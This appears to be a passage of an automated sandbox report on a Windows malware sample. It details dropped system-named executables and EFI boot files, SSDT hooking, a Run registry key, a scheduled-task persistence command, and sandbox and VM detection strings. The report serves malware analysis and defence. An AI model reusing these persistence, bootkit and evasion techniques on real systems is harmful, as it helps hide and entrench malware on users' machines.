Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: .pdb.dbg source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: symsrv.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.551813836.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.363596992.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.392506023.0000000000C55000.00000040.00020000.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: EfiGuardDxe.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: dbghelp.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 14.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 23.2.csrss.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 34.2.csrss.exe.400000.3.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 42.2.csrss.exe.400000.1.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 50.2.csrss.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 14.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 23.2.csrss.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 34.2.csrss.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 42.2.csrss.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 50.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
PE file contains sections with non-standard names
Source: injector.exe.14.dr Static PE information: section name: _RDATA
Source: windefender.exe.14.dr Static PE information: section name: UPX2
Source: bootmgfw.efi.14.dr Static PE information: section name: .xdata
Source: bootx64.efi.14.dr Static PE information: section name: .xdata
Source: EfiGuardDxe.efi.14.dr Static PE information: section name: .xdata
Source: NtQuerySystemInformationHook.dll.14.dr Static PE information: section name: _RDATA
PE file contains an invalid checksum
Source: NtQuerySystemInformationHook.dll.14.dr Static PE information: real checksum: 0x0 should be: 0x2279d
Source: EfiGuardDxe.efi.14.dr Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
Source: windefender.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x20ae45
Source: bootmgfw.efi.14.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: injector.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x54ea2
Source: bootx64.efi.14.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: csrss.exe.10.dr Static PE information: real checksum: 0x45db04 should be: 0x4549c8
Source: 4t4y4r89UZ.exe Static PE information: real checksum: 0x45db04 should be: 0x4549c8
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior:

Creates files in the system32 config directory
Source: C:\Windows\System32\netsh.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\fodhelper.exe Executable created and started: C:\Windows\rss\csrss.exe
Drops PE files with benign system names
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File created: C:\Windows\rss\csrss.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi
Drops PE files
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Boot\old.efi (copy)
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File created: C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi
Source: C:\Windows\rss\csrss.exe File created: C:\Windows\windefender.exe
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Microsoft\Boot\fw.efi (copy)
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File created: C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe File created: C:\Windows\windefender.exe

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: VMUSRVC.EXE
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: SHAREDINTAPP.EXESMSS.EXESHAREDINTAPP.EXECSRSS.EXESHAREDINTAPP.EXEWININIT.EXESHAREDINTAPP.EXECSRSS.EXESHAREDINTAPP.EXEWINLOGON.EXESHAREDINTAPP.EXESERVICES.EXESHAREDINTAPP.EXELSASS.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDWM.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESPOOLSV.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESIHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXECTFMON.EXESHAREDINTAPP.EXEEXPLORER.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESEARCHUI.EXESEARCHUI.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEHXTSR.EXEHXTSR.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEWMIPRVSE.EXE
WMIPRVSE.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXECONHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEUSOCLIENT.EXEUSOCLIENT.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESGRMBROKER.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXE4T4Y4R89UZ.EXESHAREDINTAPP.EXE[SYSTEM PROCESS]VMSRVC.EXEVMUSRVC.EXESYSTEMSYSTEMVMSRVC.EXEVMUSRVC.EXEREGISTRYREGISTRY
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmp Binary or memory string: VMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESPOOLSV.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXE4T4Y4R89UZ.EXEVMSRVC.EXEVMUSRVC.EXEVPC-S3VPCUHUB$
Source: csrss.exe Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGE
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: 